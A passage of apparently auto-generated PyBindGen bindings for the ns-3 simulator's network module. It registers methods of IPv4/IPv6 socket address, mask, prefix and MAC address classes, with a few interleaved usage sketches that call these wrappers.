## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6, uint16_t port) [constructor]
cls.add_constructor([param('char const *', 'ipv6'), param('uint16_t', 'port')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6) [constructor]
cls.add_constructor([param('char const *', 'ipv6')])
## inet6-socket-address.h (module 'network'): static ns3::Inet6SocketAddress ns3::Inet6SocketAddress::ConvertFrom(ns3::Address const & addr) [member function]
cls.add_method('ConvertFrom',
'ns3::Inet6SocketAddress',
[param('ns3::Address const &', 'addr')],
is_static=True)
## inet6-socket-address.h (module 'network'): ns3::Ipv6Address ns3::Inet6SocketAddress::GetIpv6() const [member function]
cls.add_method('GetIpv6',
'ns3::Ipv6Address',
[],
is_const=True)
## inet6-socket-address.h (module 'network'): uint16_t ns3::Inet6SocketAddress::GetPort() const [member function]
cls.add_method('GetPort',
'uint16_t',
[],
is_const=True)
## inet6-socket-address.h (module 'network'): static bool ns3::Inet6SocketAddress::IsMatchingType(ns3::Address const & addr) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'addr')],
is_static=True)
## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetIpv6(ns3::Ipv6Address ipv6) [member function]
cls.add_method('SetIpv6',
'void',
[param('ns3::Ipv6Address', 'ipv6')])
## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetPort(uint16_t port) [member function]
cls.add_method('SetPort',
'void',
[param('uint16_t', 'port')])
return
def register_Ns3InetSocketAddress_methods(root_module, cls):
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::InetSocketAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::InetSocketAddress const &', 'arg0')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4, uint16_t port) [constructor]
cls.add_constructor([param('ns3::Ipv4Address', 'ipv4'), param('uint16_t', 'port')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4) [constructor]
cls.add_constructor([param('ns3::Ipv4Address', 'ipv4')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(uint16_t port) [constructor]
cls.add_constructor([param('uint16_t', 'port')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4, uint16_t port) [constructor]
cls.add_constructor([param('char const *', 'ipv4'), param('uint16_t', 'port')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4) [constructor]
cls.add_constructor([param('char const *', 'ipv4')])
## inet-socket-address.h (module 'network'): static ns3::InetSocketAddress ns3::InetSocketAddress::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::InetSocketAddress',
[param('ns3::Address const &', 'address')],
is_static=True)
## inet-socket-address.h (module 'network'): ns3::Ipv4Address ns3::InetSocketAddress::GetIpv4() const [member function]
cls.add_method('GetIpv4',
'ns3::Ipv4Address',
[],
is_const=True)
## inet-socket-address.h (module 'network'): uint16_t ns3::InetSocketAddress::GetPort() const [member function]
cls.add_method('GetPort',
'uint16_t',
[],
is_const=True)
## inet-socket-address.h (module 'network'): static bool ns3::InetSocketAddress::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetIpv4(ns3::Ipv4Address address) [member function]
cls.add_method('SetIpv4',
'void',
[param('ns3::Ipv4Address', 'address')])
## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetPort(uint16_t port) [member function]
cls.add_method('SetPort',
'void',
[param('uint16_t', 'port')])
return
def register_Ns3Ipv4Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor]
cls.add_constructor([param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('CombineMask',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv4Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv4Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('GetSubnetDirectedBroadcast',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Address const &', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function]
cls.add_method('IsLocalMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('IsSubnetDirectedBroadcast',
'bool',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
return
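# --- Editorial note: functions of the form register_Ns3<Class>_methods() are PyBindGen hooks
# that attach constructors, methods and operators to a class wrapper created elsewhere in this
# generated module. A minimal, hand-written sketch of the same pattern follows; it is not part
# of the scanner output, and the 'demo' module name and header path are illustrative only.
def _pybindgen_pattern_sketch():
    import sys
    from pybindgen import Module, FileCodeSink, param
    mod = Module('demo')
    mod.add_include('"ipv4-address.h"')
    cls = mod.add_class('Ipv4Address')
    cls.add_constructor([param('char const *', 'address')])
    cls.add_method('IsBroadcast', 'bool', [], is_const=True)
    mod.generate(FileCodeSink(sys.stdout))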
def register_Ns3Ipv4Mask_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor]
cls.add_constructor([param('uint32_t', 'mask')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor]
cls.add_constructor([param('char const *', 'mask')])
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function]
cls.add_method('GetInverse',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint16_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Mask', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'mask')])
return
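# --- Editorial sketch: how the Ipv4Address/Ipv4Mask wrappers registered above can be exercised
# from Python. Assumes the generated ns.network extension module is built and importable; the
# concrete addresses are illustrative.
def _ipv4_address_usage_sketch():
    import ns.network
    addr = ns.network.Ipv4Address("10.1.1.7")
    mask = ns.network.Ipv4Mask("255.255.255.0")
    network = addr.CombineMask(mask)                # 10.1.1.0
    bcast = addr.GetSubnetDirectedBroadcast(mask)   # 10.1.1.255
    return network, bcast, mask.GetPrefixLength()   # prefix length 24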
def register_Ns3Ipv6Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor]
cls.add_constructor([param('uint8_t *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function]
cls.add_method('CombinePrefix',
'ns3::Ipv6Address',
[param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv6Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv6Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function]
cls.add_method('GetAllHostsMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function]
cls.add_method('GetAllNodesMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function]
cls.add_method('GetAllRoutersMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function]
cls.add_method('GetIpv4MappedAddress',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function]
cls.add_method('IsAllHostsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function]
cls.add_method('IsAllNodesMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function]
cls.add_method('IsAllRoutersMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function]
cls.add_method('IsAny',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Address const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsIpv4MappedAddress() [member function]
cls.add_method('IsIpv4MappedAddress',
'bool',
[])
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function]
cls.add_method('IsLinkLocal',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function]
cls.add_method('IsLinkLocalMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function]
cls.add_method('IsLocalhost',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function]
cls.add_method('IsSolicitedMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function]
cls.add_method('MakeAutoconfiguredAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function]
cls.add_method('MakeAutoconfiguredLinkLocalAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'mac')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function]
cls.add_method('MakeIpv4MappedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv4Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function]
cls.add_method('MakeSolicitedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv6Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function]
cls.add_method('Set',
'void',
[param('uint8_t *', 'address')])
return
def register_Ns3Ipv6Prefix_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor]
cls.add_constructor([param('uint8_t *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor]
cls.add_constructor([param('char const *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor]
cls.add_constructor([param('uint8_t', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint8_t',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Prefix const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
return
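# --- Editorial sketch: equivalent usage of the Ipv6Address/Ipv6Prefix wrappers registered above.
# Assumes an importable ns.network build; the addresses and prefix length are illustrative.
def _ipv6_address_usage_sketch():
    import ns.network
    addr = ns.network.Ipv6Address("2001:db8::1")
    prefix = ns.network.Ipv6Prefix(64)
    net = addr.CombinePrefix(prefix)    # 2001:db8::
    same_subnet = prefix.IsMatch(addr, ns.network.Ipv6Address("2001:db8::2"))
    return net, same_subnet, prefix.GetPrefixLength()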
def register_Ns3Mac48Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(ns3::Mac48Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac48Address const &', 'arg0')])
## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address() [constructor]
cls.add_constructor([])
## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(char const * str) [constructor]
cls.add_constructor([param('char const *', 'str')])
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::Allocate() [member function]
cls.add_method('Allocate',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Mac48Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyFrom(uint8_t const * buffer) [member function]
cls.add_method('CopyFrom',
'void',
[param('uint8_t const *', 'buffer')])
## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'void',
[param('uint8_t *', 'buffer')],
is_const=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv4Address address) [member function]
cls.add_method('GetMulticast',
'ns3::Mac48Address',
[param('ns3::Ipv4Address', 'address')],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv6Address address) [member function]
cls.add_method('GetMulticast',
'ns3::Mac48Address',
[param('ns3::Ipv6Address', 'address')],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast6Prefix() [member function]
cls.add_method('GetMulticast6Prefix',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticastPrefix() [member function]
cls.add_method('GetMulticastPrefix',
'ns3::Mac48Address',
[],
is_static=True)
## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True)
## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsGroup() const [member function]
cls.add_method('IsGroup',
'bool',
[],
is_const=True)
## mac48-address.h (module 'network'): static bool ns3::Mac48Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
return
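# --- Editorial sketch: the static Mac48Address::GetMulticast overloads registered above derive
# the multicast MAC address for an IPv4 (or IPv6) group address. The import path and group
# address are illustrative assumptions.
def _mac48_multicast_sketch():
    import ns.network
    group = ns.network.Ipv4Address("224.0.0.251")
    mac = ns.network.Mac48Address.GetMulticast(group)   # 01:00:5e:... mapping
    return mac, mac.IsGroup()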
def register_Ns3Mac64Address_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## mac64-address.h (module 'network'): ns3::Mac64Address::Mac64Address(ns3::Mac64Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Mac64Address const &', 'arg0')])
## mac64-address.h (module 'network'): ns3::Mac64Address::Mac64Address() [constructor]
cls.add_constructor([])
## mac64-address.h (module 'network'): ns3::Mac64Address::Mac64Address(char const * str) [constructor]
cls.add_constructor([param('char const *', 'str')])
## mac64-address.h (module 'network'): static ns3::Mac64Address ns3::Mac64Address::Allocate() [member function]
cls.add_method('Allocate',
'ns3::Mac64Address',
[],
is_static=True)
## mac64-address.h (module 'network'): static ns3::Mac64Address ns3::Mac64Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Mac64Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## mac64-address.h (module 'network'): void ns3::Mac64Address::CopyFrom(uint8_t const * buffer) [member function]
cls.add_method('CopyFrom',
'void',
[param('uint8_t const *', 'buffer')])
## mac64-address.h (module 'network'): void ns3::Mac64Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'void',
[param('uint8_t *', 'buffer')],
is_const=True)
## mac64-address.h (module 'network'): static bool ns3::Mac64Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
return
def register_Ns3NetDeviceContainer_methods(root_module, cls):
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::NetDeviceContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDeviceContainer const &', 'arg0')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer() [constructor]
cls.add_constructor([])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::Ptr<ns3::NetDevice> dev) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::NetDevice >', 'dev')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(std::string devName) [constructor]
cls.add_constructor([param('std::string', 'devName')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::NetDeviceContainer const & a, ns3::NetDeviceContainer const & b) [constructor]
cls.add_constructor([param('ns3::NetDeviceContainer const &', 'a'), param('ns3::NetDeviceContainer const &', 'b')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(ns3::NetDeviceContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::NetDeviceContainer', 'other')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(std::string deviceName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'deviceName')])
## net-device-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::NetDevice>*,std::vector<ns3::Ptr<ns3::NetDevice>, std::allocator<ns3::Ptr<ns3::NetDevice> > > > ns3::NetDeviceContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::NetDevice > const, std::vector< ns3::Ptr< ns3::NetDevice > > >',
[],
is_const=True)
## net-device-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::NetDevice>*,std::vector<ns3::Ptr<ns3::NetDevice>, std::allocator<ns3::Ptr<ns3::NetDevice> > > > ns3::NetDeviceContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::NetDevice > const, std::vector< ns3::Ptr< ns3::NetDevice > > >',
[],
is_const=True)
## net-device-container.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::NetDeviceContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_const=True)
## net-device-container.h (module 'network'): uint32_t ns3::NetDeviceContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
